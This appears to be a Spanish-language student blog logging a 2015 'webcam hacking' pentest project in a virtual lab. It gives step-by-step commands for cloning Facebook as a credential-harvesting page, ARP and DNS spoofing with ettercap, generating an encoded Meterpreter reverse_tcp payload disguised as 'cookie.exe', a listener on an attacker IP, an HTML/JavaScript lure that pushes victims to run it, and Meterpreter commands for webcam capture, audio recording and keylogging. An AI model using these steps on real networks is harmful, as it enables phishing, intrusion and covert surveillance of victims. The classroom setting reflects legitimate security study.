dijous, 28 de maig del 2015

Video y Documentación

Hoy hemos acabado de grabar el video y pasaremos a editarlo, tambien terminaremos la documentación del trabajo.



dimecres, 27 de maig del 2015

Snort y Grabación del Proyecto

Hoy hemos investigado la herramienta snort.
También hemos comenzado a grabar un tutorial en video del proyecto el cual editaremos y presentaremos en CD el dia del proyecto. También hemos empezado la documentación del proyecto y el tutorial por escrito. El programa para realizar la grabación ha sido Record My Desktop de Ubuntu.

dimarts, 26 de maig del 2015

Desencriptación WEP/WPA/WPA2-PSK

Hoy hemos investigado herramientas para descifrar contraseñas de un Router Wifi, con Kali Linux.
Aircrack ha sido la herramienta estudiada. Hemos aplicado los conocimientos aprendidos para esta herramienta y nos ha dado resultado.

dilluns, 25 de maig del 2015

Comprobacion de lo aprendido

Hoy en el poco tiempo que hemos tenido de horas de proyecto hemos comprobado que todo lo aprendido y aplicado funcionaba correctamente. También hemos simulado el escenario de la presentación del proyecto y confirmado su  funcionamiento.

divendres, 22 de maig del 2015

Meterpreter

Meterpreter es el exploit que realiza la conexión con el cliente una vez ejecutado el Payload en la victima.

Meterpreter tiene muchas funciones para realizar, algunas de ellas:
- webcam_list: Ver lista de cámaras
- run webcam 1: Ejecutar en live la primera webcam de la lista anterior
- webcam_snap: Hacer una foto y guardarla
- run sound_record -t 60: Graba 60 segundos de sonido y lo guarda
- screenshot: Hacer captura de pantalla
- ps: Ver los procesos y sus PID
- migrate: Migrar un proceso
- shell: Ejecuta terminal cmd
- upload: Subir una archivo
- download: Baja un archivo
- execute: Ejecuta archivos
- keyscan_start: Empieza el keylogger a registrar las teclas pulsadas
- keyscan_dump: Muestra todo lo registrado por el keylogger
- keyscan_stop: El keylogger para de registrar las teclas pulsadas
- search: Busca en el ordenador de la victima
- getprivs: Dar privilegios
- getuid: Nos muestra el tipo de usuario que esta ejecutándose ahora mismo
- sysinfo: Nos muestra información del sistema
- idletime: Permite mostrarnos el tiempo que el usuario a estado ausente







dijous, 21 de maig del 2015

Como implementar Payload (III)

Finalmente, para que el cliente ejecute el payload lo hemos echo de la siguiente forma:

Primero de todo creamos un Payload con el nombre de cookie.exe y lo copiamos en var/www
Ahora abrimos la pagina fake con gedit, y escribimos justo después de <head> el siguiente código:

<meta http­equiv=”refresh” content=”2;cookie.exe”>

Y luego justo antes de cerrar el body, lo identificaremos con la etiqueta </body>, escribimos el siguiente script.

<script type=”text/javascript”> alert(“Para visualizar este sitio web, se requiera la instalación de un cookie”); </script>

Este código lo que hace es, primero se descargará el archivo cookie.exe, automáticamente pasado 2 segundos, y con el segundo código, va a aparecer una alerta en cuanto se cargue la pagina con el siguiente mensaje: Para visualizar este sitio web, se requiera la instalación de un cookie.Si la victima es tan ingenua como para ejecutar el cookie, ya podremos controlar su ordenador.

dimecres, 20 de maig del 2015

Como implementar Payload (II)

Bueno hoy hemos llegado a la conclusión de que, Javascript está muy controlado, por los navegadores y los firewall, por lo tanto hemos descartado la posibilidad de poder ejecutar 
automáticamente el Payload en la maquina de la victima.

Ahora hay que encontrar un modo de que el usuario se descargue el Payload y lo instalé pensando que es otra cosa que le haga falta o le provoque interés.

dimarts, 19 de maig del 2015

Como implementar Payload

Bien una vez realizado todo lo citado en la entrada "Creacion de Payload", solo queda que el cliente ejecute el Payload. En nuestro caso vamos a intentar buscar alguna forma de que cuando entre en nuestra pagina web se infecte automáticamente, sin que la victima se de cuenta.

dilluns, 18 de maig del 2015

Estableciendo el control de la victima

Ya tengamos el ejecutable, ahora lo vamos a dejar escuchando para que en cuanto la víctima ejecute el payload, se cree la conexión. Para ello entramos en msfconsole y ejecutamos lo sigiente:

# msfconsole

> use exploit/multi/handles

> set payload windows/meterpreter/reverse_tcp

> set lhost 192.168.1.99

> set lport 4444

> exploit

Y lo dejamos esperando a la respuesta del servidor.

divendres, 15 de maig del 2015

Creación de Payload

Para crear el Payload, y así infectar la maquina de la victima, nos dirigimos a terminal y seguimos estos pasos:

# msfconsole

Una vez cargado el programa, vamos a elegir el siguiente payload:

> use windows/meterpreter/reverse_tcp

Ahora tenemos que configurar el lhost y lport.

Lhost: Ip del atacante.
Lport: Puerto por el que el atacante escucha.

> set lhost 192.168.1.99

> set lport 4444

Ahora vamos a ejecutar un comando para comprimir el payload con el siguiente

comando.

> generate ­e x86/shikata_ga_nai ­i 30 ­t exe ­f cookie.exe

dijous, 14 de maig del 2015

Exploit y Payload

Hoy nos hemos estado informando sobre los conceptos de payload exploit.


Exploit es todo el software que se utiliza para insertar un payload a través de una vunerabilidad y así poder aprovechar esta situación.


Payload es lo que se utiliza para aumentar la vunerabilidad, e infectar la maquina de la victima.

dimecres, 13 de maig del 2015

DNS Spoof (Resuelto)

Hoy hemos conseguido realizar la búsqueda por nombre en la victima. Y no rer



Para hacer DNS_Spoof correctamente no hace falta instalar BIND9, simplemente necesitamos SETOOLKIT (fake pagina) y ETTERCAP desde terminal (DNS y ARP spoofing).



Primero configuraremos el ficherito ettercap.dns que esta ubicado en: /etc/ettercap. Dentro del fichero creamos tres lineas con los siguientes parametros:
facebook.com A IP_atacante
*.facebook.com A IP_atacante
www.facebook.com PTR IP_atacante



 Una vez modificado correctamente el fichero ettercap.dns, nos vamos a la herramienta setoolkit y crearemos el fake de la pagina, simplemente indicando nuestra ip, y el nombre de la web que queremos copiar en nuestro caso www.facebook.com.



Una vez tengamos el fake de "www.facebook.com" creado (como hacerlo), abriremos la terminal de kali linux y escribiremos el siguiente comando para iniciar el ataque: ettercap -T -q -i eth0 -P dns_spoof -M arp // 



Con esto envenenaremos a toda la red, clonando la MAC del router y así reciviendo todas las peticiones. Finalmente funciona correctamente, y si en el navegador del cliente, escribimos facebook.com nos redirige hacia nuestra web falsa correctamente.

dimarts, 12 de maig del 2015

BIND9


Hoy hemos configurado el DNS falso de kali linux con BIND9.



Una vez hemos creado el servidor DNS hemos realizado el "fake" de facebook con SETOOLKIT, seguidamente hemos hecho ARP spoofing con DNSSPLOIT y finalmente hemos iniciado ETTERCAP para realizar DNS spoofing...



El resultado ha sido que desde el cliente o victima mejor dicho podemos ver el fake poniendo la IP de kali linux pero no resuelve por nombre "www.facebook.com".



En la terminal de la victima si tecleamos tanto tracert como ping a www.facebook.com nos redirecciona a la IP de Kali... Tambien haciendo nslookup a www.facebook.com nos da la IP de Kali, y para comprobar que hemos realizado el ARP spoofing hemos puesto arp -a en cmd y nos marcaba que se habia suplantado correctamente la MAC de las IP.







divendres, 8 de maig del 2015

DNS y ARP Spoof


Arp-spoofing



Con el metaspolit, hemos configurado el arp-spoofing para clonar la mac del gateway, y así dirigir las peticiones al atacante.



Dns-spoofing



Con ettercap grafico hemos activado el dns-spoofing, con lo qual hacemos creer al cliente que el atacante es el dns, y junto al fichero etc/ettercap/etter.dns configuramos la resolucion de nombres.

Pero no nos hace el spoof correctamente, por que en el cliente hacemos un tracert www.facebook.com y el primer salto no se dirige hacia nuestra IP. Seguiremos investigando.

dijous, 7 de maig del 2015

Web Fake

Hoy hemos configurado la Web fake:

Web Fake

Con el setoolkit hemos clonado una web, para crear la web fake y proporcionarla en lugar de la web verdadera al cliente.

Para creala, hemos ejecutado una terminal, hemos iniciado el comando:

 # Setoolkit

Y hemos escojido las distintas opciones:

1) Social­Engineering Attacks

2) Website Attack Vector

3) Credential Harvester Attack Method

2) Site Cloner

Ahora nos pedirá que intoroduzcamos una IP, ponemos la del atacante. Acto seguido nos
va a pedir la dirección web de la pagina que queremos clonar, en nuestro caso https://www.facebook.com
Empezará a copiar la pagina web, y finalmente nos dice que si queremos iniciar el servicio de Apache, indicamos que si.
Ya tenemos la pagina web de facebook clonada, si en el navegador web, ponemos la ip del atacante, saldrá nuestra pagina web fake.

dimecres, 6 de maig del 2015

Setoolkit y Ettercap

Hoy hemos investigado las herramientas ettercap-graphical, setoolkit y el concepto dnsspoof.

Ettercap-Graphical es un sniffer que hemos utilziado para analizar la red y comprobar las MAC e IP de los hosts conectados.

Setoolkit es un programa para crear Fake de páginas web.

Estudiando el concepto dnsspoof primero explicaremos ARP Spoofing.

  • ARP Spoofing és enviar mensajes ARP "( protocolo de la capa de enlace de datos responsable de encontar la direccion hardware [Ethernet MAC] que corresponde a una determinada dirección IP)" falsos a la Ethernet.
      • Hemos utilizado la herramienta "WebSploit" de Kali Linux, con ayuda de este tutorial.
  • DNSSPOOF...Cuando logramos hacer un ARP Spoofing, esta herramineta crea un sencillo servidor DNS y redirecciona las consultas de nombres de los clientes a este último servidor.  Esto hace que, si nuestra víctima quiere saber la dirección IP de tiwtter.com, por ejemplo, nos la redireccione a otra IP, como podría ser a nuestra propia IP, y que esta tenga montada un seridor Web con un Scam que robe sus datos.

dimarts, 5 de maig del 2015

Openvas (II) y Nmap

Hoy hemos conseguido entrar y configurar correctamente el Openvas y solucionar el problema de los usuarios y contraseñas. Pero no nos ha gustado mucho este programa porque, para las prestaciones que nos da, nmap, consume muchos menos recursos, y hace una funcion parecidad, por lo tanto hemos cambiado OpenVas por Nmap.

Y con el Nmap hemos escaneado la red y averiguado los sistemas operativos y Ips de la red.


dilluns, 4 de maig del 2015

OpenVas (II)

OpenVas

OpenVas nos está dando problemas, principalmente por que para iniciarlo, hay que activar servicio apache para que nos active el portal web, hay que crear un certificado, y usuario administrador, pero menos la activación del portal, web, lo demás no encontramos la manera de hacerlo correctamente.

Por lo tanto podemos acceder a login del programa, pero no podemos logearnos correctamente. Seguiremos investigando.

dimecres, 29 d’abril del 2015

Openvas (I)


Hoy hemos instalado Kali Linux en una maquina virtual.

Openvas

Openvas es una herramienta para escanear y buscar debilidades de una red.
- Hemos buscado información sobre el programa y como utilizarlo, pero hemos tenido un problema con el programa ya que no nos funcionaban los comandos.



dimarts, 28 d’abril del 2015

Preparando escenario virtual

Hoy hemos creado un escenario con maquinas virtuales para hacer pruebas, y hemos empezado a instalar los sistemas operativos. Tenemos instalado un Windows XP y un Router Mikrotik... 

Mikrotik

En el Mikrotik hemos configurado
- Dos tarjetas de red, ether1 conectado a la red del instituto, y ether2 en red interna.
- Salida a internet con una Nat dinámica.
- Creado el dhcp-server para que los clientes (Windows XP) reciban IP automática con el siguientes parámetros:
- Rango de IPs (192.168.1.100-192.168.1.151
- Asignado "8.8.8.8" como DNS 
- Puerta de enlace con la IP del Mikrotik. 


Windows XP (Cliente)

En el Windows XP hemos configurado:
- Tarjeta de red en modo interno.
- IPv4 recibir por dhcp.



Por ultimo lo que hemos hecho ha sido descargar la ISO de Kali Linux, ya que Virtual Box no tienen opción por defecto para arrancar des de USB booteable.

dilluns, 27 d’abril del 2015

Primer día

Hoy hemos buscado las posibles herramientas que vamos a utilizar. Y hemos realizado un pequeño esquema simple indicando los pasos a seguir.
0- Contexto del projecto (descripción, diagrama, ...)
1 -Pentesting (hackin etico). Por ejemple: http://d3ny4ll.blogspot.com.es/2008/11/pentest-una-breve-guia.html    documentación oficial sobre pentesting:    https://www.owasp.org/images/8/80/Gu%C3%ADa_de_pruebas_de_OWASP_ver_3.0.pdf
3- Framework  Kali-Linux
4- Implementación Pasos del projecto "Pentesting hacking Webcam"
   4-1 Obtener informacion de la red y hack wifi. Possibles herramientas kismet+aircrack
   4-2 Obtener informacion (vulnerabilidades) equipos en red. Posible herramienta Openvas (Nessus)
   4-3 dns-spoof. Posible herramienta metasploit:  http://lifeofpentester.blogspot.com.es/2013/06/how-to-spoof-dns-in-kali-linux-facebook.html
         Crear web  "fake"
   4-4 Ataques (metasploit)
        4-4-1 Webcam hack with a metasploit payload:
                   https://linuxtrickss.wordpress.com/2015/03/07/how-to-hack-any-web-camera-of-remote-pc-using-kali-linux/
                  http://serversdeminecraft.com/go-vFGvsc7JeQU/hacking-webcam-pc-with-kali-linux-step-by-step.html
        4-4-2 Remote control with a metasploit payload:
               https://www.youtube.com/watch?v=EsVpqIs7nK4
               http://kalilinuxfans.blogspot.com.es/2013/05/hack-any-windows-7-with-metasploit.html
        4-4-3 Acceso directo a equipo
        http://hacking-pentesting.blogspot.com.es/2013/12/backdorizando-un-sistema-activando.html
   4-5 Soluciones (router, firewall, snort, ...)
5- Seguridad wifi